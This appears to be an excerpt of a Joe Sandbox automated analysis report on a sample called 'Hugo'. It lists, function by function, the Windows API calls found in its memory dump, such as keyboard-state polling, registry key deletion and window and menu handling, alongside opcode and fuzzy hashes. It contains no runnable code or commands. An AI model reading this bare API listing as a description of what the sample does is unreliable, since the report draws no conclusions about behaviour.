                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                              • API String ID: 3962739598-2766056989
                                                                                                                                                                                                              • Opcode ID: b2989b6356964851ac0bc844127470a7257ad4111f3482233a60a462eb29bf55
                                                                                                                                                                                                              • Instruction ID: 2dd34dd476228c4e943ff5ccc003958a7fe00a0f57158b2441242b687bfaca43
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2989b6356964851ac0bc844127470a7257ad4111f3482233a60a462eb29bf55
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02B1CBB1A00219DFDF14CF68C9847AE3BF2FF85720F188069EC459B295D734A984EB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00F752E6
                                                                                                                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00F75328
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F75339
                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 00F75345
                                                                                                                                                                                                              • _wcsstr.LIBVCRUNTIME ref: 00F7537A
                                                                                                                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00F753B2
                                                                                                                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00F753EB
                                                                                                                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00F75445
                                                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00F75477
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00F754EF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                              • String ID: ThumbnailClass
                                                                                                                                                                                                              • API String ID: 1311036022-1241985126
                                                                                                                                                                                                              • Opcode ID: cb02d1b138e160443466151bb1c1d31a770c40cfeb6e57c30d01c0102b3defbf
                                                                                                                                                                                                              • Instruction ID: 3dbc68401db1ebde57ffbb69e2291028e10faa22bcebbac0eeb51e2c4d737348
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb02d1b138e160443466151bb1c1d31a770c40cfeb6e57c30d01c0102b3defbf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B912B71504B06AFD704CF24CC90BA9B7AAFF41724F04851AFA4E82190EBB5FD55EB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F124B0
                                                                                                                                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FA97B6
                                                                                                                                                                                                              • GetFocus.USER32 ref: 00FA97C6
                                                                                                                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00FA97D1
                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00FA9879
                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00FA992B
                                                                                                                                                                                                              • GetMenuItemCount.USER32(?), ref: 00FA9948
                                                                                                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00FA9958
                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00FA998A
                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00FA99CC
                                                                                                                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FA99FD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 1026556194-4108050209
                                                                                                                                                                                                              • Opcode ID: 94ba1465d8944ac7e763f927de458d6ddc3dee1b6770e44b6f6f078ff810022b
                                                                                                                                                                                                              • Instruction ID: b6f8c74a50fc512dd74399f3983d135a38a1bb1a591a1b87de0ba6ba2cfad186
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94ba1465d8944ac7e763f927de458d6ddc3dee1b6770e44b6f6f078ff810022b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B81D6B1908355AFD710CF14CC84A6B7BE8FF8A364F04052DF98597291DBB4D905EBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(00FE29C0,000000FF,00000000,00000030), ref: 00F7C973
                                                                                                                                                                                                              • SetMenuItemInfoW.USER32(00FE29C0,00000004,00000000,00000030), ref: 00F7C9A8
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 00F7C9BA
                                                                                                                                                                                                              • GetMenuItemCount.USER32(?), ref: 00F7CA00
                                                                                                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00F7CA1D
                                                                                                                                                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00F7CA49
                                                                                                                                                                                                              • GetMenuItemID.USER32(?,?), ref: 00F7CA90
                                                                                                                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F7CAD6
                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F7CAEB
                                                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F7CB0C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 1460738036-4108050209
                                                                                                                                                                                                              • Opcode ID: 927b390a9ddaff782285cfcb4e5610cce26a171774ade70fe78ecb3413982e9a
                                                                                                                                                                                                              • Instruction ID: 8bffe42e74a69d47b03ae7f42f9df87ee54f2ff03cc0c78713af536e156a0432
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 927b390a9ddaff782285cfcb4e5610cce26a171774ade70fe78ecb3413982e9a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11619371D00249AFEF11CF68DC89AEE7BB9FB45358F04801AF955A3151D738AD01EBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00F7E4D4
                                                                                                                                                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00F7E4FA
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F7E504
                                                                                                                                                                                                              • _wcsstr.LIBVCRUNTIME ref: 00F7E554
                                                                                                                                                                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00F7E570
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                              • API String ID: 1939486746-1459072770
                                                                                                                                                                                                              • Opcode ID: d2273548237553c672b9bea0e77ebbf4e96e07169a0a291255d8ddd332617681
                                                                                                                                                                                                              • Instruction ID: 123750ee9d19f55f8344a6b433ffdf547613a5cdb7fd236c0892e856a6abcfb6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d2273548237553c672b9bea0e77ebbf4e96e07169a0a291255d8ddd332617681
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B44106B29042187ADB01BB649C47EBF776CDF55730F14406BF905E6182FB78EA01B2A6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00F9D6C4
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00F9D6ED
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00F9D7A8
                                                                                                                                                                                                                • Part of subcall function 00F9D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00F9D70A
                                                                                                                                                                                                                • Part of subcall function 00F9D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00F9D71D
                                                                                                                                                                                                                • Part of subcall function 00F9D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F9D72F
                                                                                                                                                                                                                • Part of subcall function 00F9D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00F9D765
                                                                                                                                                                                                                • Part of subcall function 00F9D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00F9D788
                                                                                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F9D753
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                              • API String ID: 2734957052-4033151799
                                                                                                                                                                                                              • Opcode ID: 9e591fd20b346a380e397c0621e1b759df44f9f18b491483a740e41736a3918d
                                                                                                                                                                                                              • Instruction ID: 044286c0a26806e9d58ae23a9a31a766ba575455e837ec6bb9d29e5cacb172cc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e591fd20b346a380e397c0621e1b759df44f9f18b491483a740e41736a3918d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 453180B6D0112DBBEB209B90DC88EFFBB7CEF46754F100065F906E2104DA349E45AAA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 00F7EFCB
                                                                                                                                                                                                                • Part of subcall function 00F2F215: timeGetTime.WINMM(?,?,00F7EFEB), ref: 00F2F219
                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 00F7EFF8
                                                                                                                                                                                                              • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00F7F01C
                                                                                                                                                                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F7F03E
                                                                                                                                                                                                              • SetActiveWindow.USER32 ref: 00F7F05D
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F7F06B
                                                                                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F7F08A
                                                                                                                                                                                                              • Sleep.KERNEL32(000000FA), ref: 00F7F095
                                                                                                                                                                                                              • IsWindow.USER32 ref: 00F7F0A1
                                                                                                                                                                                                              • EndDialog.USER32(00000000), ref: 00F7F0B2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                              • String ID: BUTTON
                                                                                                                                                                                                              • API String ID: 1194449130-3405671355
                                                                                                                                                                                                              • Opcode ID: 0ddadbe1a33427db64640bd038d9e267f0ea3a49d7a7ce29e3842b4709827a88
                                                                                                                                                                                                              • Instruction ID: aff879488b83e7f0944678ffe7a3ea62dc030836a2ef9ca2c7cdba447fa08fd6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ddadbe1a33427db64640bd038d9e267f0ea3a49d7a7ce29e3842b4709827a88
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47219FB190024CBFEB116F30ECCDE667BA9FB4A755B048026F50A86772DB758C04BA12
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333
                                                                                                                                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F7F374
                                                                                                                                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F7F38A
                                                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F7F39B
                                                                                                                                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F7F3AD
                                                                                                                                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F7F3BE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: SendString$_wcslen
                                                                                                                                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                              • API String ID: 2420728520-1007645807
                                                                                                                                                                                                              • Opcode ID: 3e758df0dc2e8d59bd55bf0c30f49935ef79c606e0d797c2f86717272c5f5d55
                                                                                                                                                                                                              • Instruction ID: 6fa9d1a609810f78aca4e4f7e9aba73bf4838b662f150d858fde9a56a6dde426
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e758df0dc2e8d59bd55bf0c30f49935ef79c606e0d797c2f86717272c5f5d55
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45110632A5026979D720B362DC1AEFF7B7CEBD2B10F44042B7401E60D0EAA09D45E5B3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00F7A9D9
                                                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 00F7AA44
                                                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00F7AA64
                                                                                                                                                                                                              • GetKeyState.USER32(000000A0), ref: 00F7AA7B
                                                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00F7AAAA
                                                                                                                                                                                                              • GetKeyState.USER32(000000A1), ref: 00F7AABB
                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00F7AAE7
                                                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 00F7AAF5
                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00F7AB1E
                                                                                                                                                                                                              • GetKeyState.USER32(00000012), ref: 00F7AB2C
                                                                                                                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00F7AB55
                                                                                                                                                                                                              • GetKeyState.USER32(0000005B), ref: 00F7AB63
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 541375521-0
                                                                                                                                                                                                              • Opcode ID: 676a9e9a85166172eb44ab7e56b162be9cad2c09a1a63ec21d4df2269dad3c89
                                                                                                                                                                                                              • Instruction ID: 50501ce2acfb1f4ce6b3ad77831ba15797b11297926bb3178b887545f53ebca0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 676a9e9a85166172eb44ab7e56b162be9cad2c09a1a63ec21d4df2269dad3c89
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95510760E0478829FB35D7748850BEEBFB58F82350F0AC59BC5CA4A1C2DA649B4CD763
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00F76649
                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00F76662
                                                                                                                                                                                                              • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00F766C0
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00F766D0
                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00F766E2
                                                                                                                                                                                                              • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00F76736
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00F76744
                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00F76756
                                                                                                                                                                                                              • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00F76798
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00F767AB
                                                                                                                                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F767C1
                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00F767CE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3096461208-0
                                                                                                                                                                                                              • Opcode ID: 9b37baf26dc86a1d58c7d976e89df28b12e26faac33bff719953f8672c2a3177
                                                                                                                                                                                                              • Instruction ID: f0aebb93eaad42629acb4f43388cfe1d087a01511e12cb0c08590b3394c80105
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b37baf26dc86a1d58c7d976e89df28b12e26faac33bff719953f8672c2a3177
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B75130B1E00619AFDF18CF68CD85AAEBBB5FB48314F108129F51AE7690DB70AD04DB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F11802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F11488,?,00000000,?,?,?,?,00F1145A,00000000,?), ref: 00F11865
                                                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00F11521
                                                                                                                                                                                                              • KillTimer.USER32(00000000,?,?,?,?,00F1145A,00000000,?), ref: 00F115BB
                                                                                                                                                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00F529B4
                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00F1145A,00000000,?), ref: 00F529E2
                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00F1145A,00000000,?), ref: 00F529F9
                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00F1145A,00000000), ref: 00F52A15
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00F52A27
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 641708696-0
                                                                                                                                                                                                              • Opcode ID: 86b196e5dc064e868f9efa2aaf8bf0b5a93304505a0fcd3afa4e39f6daa155f2
                                                                                                                                                                                                              • Instruction ID: 70af66ab9b3e5780d7b16ba85a1962916a793efea56b006cb5c42f5465c84b07
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86b196e5dc064e868f9efa2aaf8bf0b5a93304505a0fcd3afa4e39f6daa155f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42619C31901719DFDB799F18D988B6A77B6FB82322F149118E6438AA71C774AC84FF40
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F12234: GetWindowLongW.USER32(?,000000EB), ref: 00F12242
